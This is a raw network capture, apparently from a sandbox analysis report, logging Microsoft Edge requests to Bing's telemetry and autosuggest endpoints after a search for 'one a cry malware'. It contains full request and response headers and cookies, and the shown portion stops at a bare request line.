HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199045.1491830a
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:06 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199046.1491892b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 666
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 509
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc7396c4597bbaba6abf4522843
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-5pU6KX0Ursuw4PA8mMroz8acRM2WE0q9yz2nWt0Nqz4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:08 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199047.14919470
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:08 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199048.1491958d
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 788
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:08 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199048.14919946
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malware&cp=17&csr=1&zis=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one%20a%20cry%20malware&cp=17&csr=1&zis=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 508
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc823c849e89b407373cbf34081
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zKb0jAo/t+AhYav+XaCQsCtHP6FVCOcrHiqMx6Qyu3I='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:08 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199048.1491996c
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 515
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc90f0a4083b1afc469ecf13d65
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-K/LTen5+6Cf3jyp5cNR2JfCEn523hlbSQBdQdOzDZms='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.14919e69
GET

